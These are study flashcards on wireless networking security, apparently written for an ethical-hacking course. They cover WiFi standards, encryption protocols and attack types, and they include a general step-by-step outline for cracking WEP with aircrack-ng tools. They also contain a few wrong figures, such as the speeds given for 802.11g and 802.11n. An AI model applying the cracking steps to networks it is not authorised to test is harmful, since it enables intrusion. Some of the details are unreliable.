Chapter 15: Wireless Networking Flashcards
Cons to WiFi
1) DECREASE IN BANDWIDTH B/C MORE DEVICES CONNECTED
2) INVEST IN NW CARDS, INFRASTRUCTURE
3) INTERFERENCE W/ OTHER DEVICES
4) LESS RANGE THAN ADVERTISED (usually half the distance promised)
5) TERRAIN CAN SLOW DOWN SIGNALS
Characteristics of WiFi
1) uses RADIO WAVES to transmit data
2) works at the physical layer of the NW
Techniques to managing a connection
1) DSSS (direct-sequence spread spectrum)
2) FHSS (frequency-hopping spread spectrum)
3) IR (infrared)
4) OFDM (orthogonal frequency-division multiplexing)
WiFi Environment: Extension to an existing wired NW as either HW (HAPs) or SW (SAPs) based access points
HAPs //use device such as wireless router or dedicated wireless access point
SAPs //wireless-enabled system attached to a wired NW, which in essence shares its wireless adapter
WiFi Environment: Multiple access points
allows clients to roam from location to location
WiFi Environment: LAN-to-LAN wireless NW
wired NWs in different locations to be connected through wireless technology
WiFi Environment: 3G or 4G hot spot
provides WiFi access to WiFi enabled devices
Wireless standards
1) 802.11a 5Ghz (freq), 54 Mbps (speed), 75 ft (range)
2) 802.11b 2.4Ghz, 11 Mbps, 150 ft
3) 802.11g 2.4Ghz, 11 Mbps, 150 ft
4) 802.11n 2.4/5Ghz, 54 Mbps, ~100 ft
5) 802.16 (WiMAX) 10-66Ghz, 70-1000 Mbps, 30 miles
6) Bluetooth 2.4Ghz, 1-3 Mbps (1st Gen), 33 ft
About SSID
Service Set Identifier
32 Bytes
Embedded within header of packets
Open NWs, it’s visible
Closed NWs, not visible or “cloaked”
Common Wireless Terms:
GSM Association BSSID Hot Spot Access Point ISM Bandwidth
GSM // Global System for Mobile Communications // international standard for mobile wireless
Association //connecting a client to an access point
BSSID // basic service set identification //MAC address of an access point
Hot Spot //location that provides wireless access to public such as coffee shop or airport
Access Point //HW or SW construct that provides wireless access
ISM band// industrial scientific, and medical band //unlicensed band of frequencies
Bandwidth //speed avilable for devices
Antennas
Yagi antenna
Omnidirectional antenna
Parabolic grid antenna
Yagi antenna //unidirectional, works well transmitting and receiving signals in some directions //typically used when signal is needed from site to site instead of covering a wide area //enhances security by limiting signals to smaller areas
Omnidirectional antenna //emits signals in all directions, but some directions better than others //can transmit data in 2-D well, but not in 3-D
Parabolic grid antenna //takes form of a dish, unidirectional, sends and receives data over one axis //PRO -catches parallel signals and focuses them to a single receiving point, so gets better signal quality and over longer ranges //can receive over a distance of 10 miles
WiFi Authentication Mode: Open System Authentication
//make NW available to wide range of clients
//authentication occurs when an authentication frame is sent from a client to an access point; access point receives frame, verifies SSID, if correct access point sends verification frame back to client, allowing connection to be made
WiFi Authentication Mode: Shared Key Authentication
//each client receives key ahead of time and can connect anytime
//clients send authentication request to access point, ap returns challenge to client, client encrypts challenge using shared key, ap uses same shared key to decrypt challenge, if responses match, client validated and connected
Wireless encryption and authentication protocols:
WEP WPA WPA2 WPA2 Enterprise TKIP AES EAP LEAP RADIUS 802.11i CCMP
WEP//Wired Equivalent Privacy//oldest and weakest
WPA//WiFi Protected Access//successor to WEP, addressed many problems //uses TKIP [Temporal Key Integrity Protocol], MIC [Message Integrity Code], and AES [Advanced Encryption Standard] encryption
WPA2//address WPA probs //uses AES, CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol), EAP [extensible authentication protocol], TKIP, AES [with longer keys]
WPA2 Enterprise//incorporates EAP to strengthen security and scale system up to large enterprise environments
TKIP//enhances WPA over WEP
AES//symmetric-key encryption//used in WPA2 to replace TKIP
EAP //incorpoaated into multiple authentication methods //such as tokent cards, Kerberos, certificates
LEAP //Lightweight Extensible Authentication Protocol //made by cisco
RADIUS //Remote Authentication Dial-in User Service //centralized authentication and authorization mgmt system
802.11i //IEEE standard that species security mechs for 802.11 wireless NWs
CCMP //uses 128bit keys, with 48bit initialization vector (IV) for replay detection
WEP
failed all: //intended to provide security on same level as wired NWs //defeat eavesdropping on communications //check integrity of data as it flows access NW //use shared key to encrypt packets prior to transmission //provide confidentiality, access control
problems: //protocol was designed without input from academic community or public and professional cryptologists //attacker can easily uncover key with ciphertext and plaintext //CRC32 //Cyclic Redundancy Check //integrity checking sis flaws and ez to modify packets //IVs//initialization vectors are only 24 bits, so an entire pools of IVs can be exhausted in short time //vulnerable to DoS attack through messages not authenticated by WEP
// WEP uses IVs a lot; randomized value used with the secret key for data encryption purposes, when these two values are combined, they form a # used once (nonce)
Cracking WEP
intercept as many IVs as possible through sniffing, analyze packets, retrieve key
make take a while, to speed up, perform packet injection
1) Start wireless interface on the attacking system in monitor mode on the specific access point channel; this mode is used to listen to packets in the air
2) probe the target NW with wireless device to determine if packet injection can be performed
3) select tool such as aireplay-ng to perform fake authentication with access point
4) Start WiFi sniffing tool to capture IVs such as aireplay-ng, ARP requests can be intercepted and reinjected back into NW causing more packet generation
5) Run a tool such as Cain and Able or aircrack-ng to extract encryption keys from IVs
AirPcap
AirPcap //used to sniff wireless frames in ways that standard WiFi cannot //good for auditing wireless NWs
WPA & cracking WPA
most important development introduced as TKIP** it changes the key after ever frame
flaws: //weak keys chosen by user //packet spoofing //authentication issues with MS-CHAP v2 [microsoft challenge handshake authentication protocol version 2]
Cracking WPA
REAVER //free in Kali, one of the best tools for cracking WPA
WPA2 and its two modes
full compatibility with 802.11i standards for security
Can function in two modes:
1) WPA2-Personal //relies on input of key into each station
2) WPA2-Enterprise //uses server to perform key mgmt and authentication for wireless clients, common components include RADIUS
Types of attacks on WPA and WPA2
Offline Attack
Deauthentication attack
Brute-force WPA keys
OFFLINE ATTACK //close proximity to access point to observe handshake between client and access point; can capture handshake and recover keys by recording and cracking them offline
DEAUTHENTICATION ATTACK //forcing a reconect
BRUTE-FORCE WPA KEYS //keep trying username and PW combinations over and over again, tools such as aircrack-ng, aireplay-ng, KisMAC
Risk Mitigation of WEP and WPA cracking
1) COMPLEX PW
2) USE SERVER VALIDATION ON CLIENT SIDE
3) ELIMINATE WEP AND WPA2, MOVE TO WPA2
4) USE ENCRYPTION STANDARDS SUCH AS CCMP, AES, TKIP
An attack against wireless NW can be passive or active
Passive //sniffing information that is transmitted
Active //using probe requests to elicit a response
Types of attacks
WARDRIVING ROGUE ACCESS POINTS REVERSE SSH TUNNELING with Raspberry Pi MAC SPOOFING AD HOC MISCONFIGURATION CLIENT MISASSOCIATION PROMISCUOUS CLIENT JAMMING ATTACKS HONEYSPOT ATTACK
WARDRIVING //driving around area with computing device to detect wireless clients and APs
Site Survey Tools KisMAC,NetStumbler, Kismet, WaveStumbler, InSSIDer
//common for these types of tools to connect to GPS to pinpoint location
Warflying // Warballooning //Warwalking //warchalking
ROGUE ACCESS POINTS //attacker installs new AP completely unsecure behind company firewall
REVERSE SSH TUNNELING //device such as raspberry pi opens connection from inside NW out to attacker to bypass FW restrictions
MAC SPOOFING //for APs that use Mac filtering, you can use Mac Spoofing; Mac filtering is used to blacklist or whitelist MAC addresses of clients; attacker can spoof address of an apprived client or switch their MAC to a client that is not blocked
Tools SMAC, ifconfig, changemac.sh
AD HOC //use of WiFi adapter to connect direct to another wireless-enabled system; two systems can interact with each other; main threat is users do not know the difference between infrastructure and ad hoc NW and so may attach to an unsecure NW
MISCONFIGURATION
CLIENT MISASSOCIATION //WiFi propagate though walls and structures; client attches to AP that is on a NW other than theirs, accidentally or unintentionally;
PROMISCUOUS CLIENT //offers irresistibly strong signal intentionally for malicious purposes
JAMMING ATTACKS //works on any type of wireless NW, essentially DoS attack; can use a specifically designed HW device that can transmit signals that interfere with 802.11 NWs
HONEYSPOT ATTACK //attacker sets up rogue access point in range of several legit ones
HW device WiFi Pineapple from Hak5
Modes of Bluetooth
Some attacks that have been made on users
DISCOVERABLE //allows device to be scanned and located by other bluetooth
LIMITED DISCOVERABLE //discovered for short period of time
NONDISCOVERABLE //cannot be located, however if another device has previously found the system it will still be able to
PAIR or NONPAIR //can or cannot pair with another device
some attacks include:
leaking calendar, address book, activate cameras, microphones, control a phone to make calls, connect to internet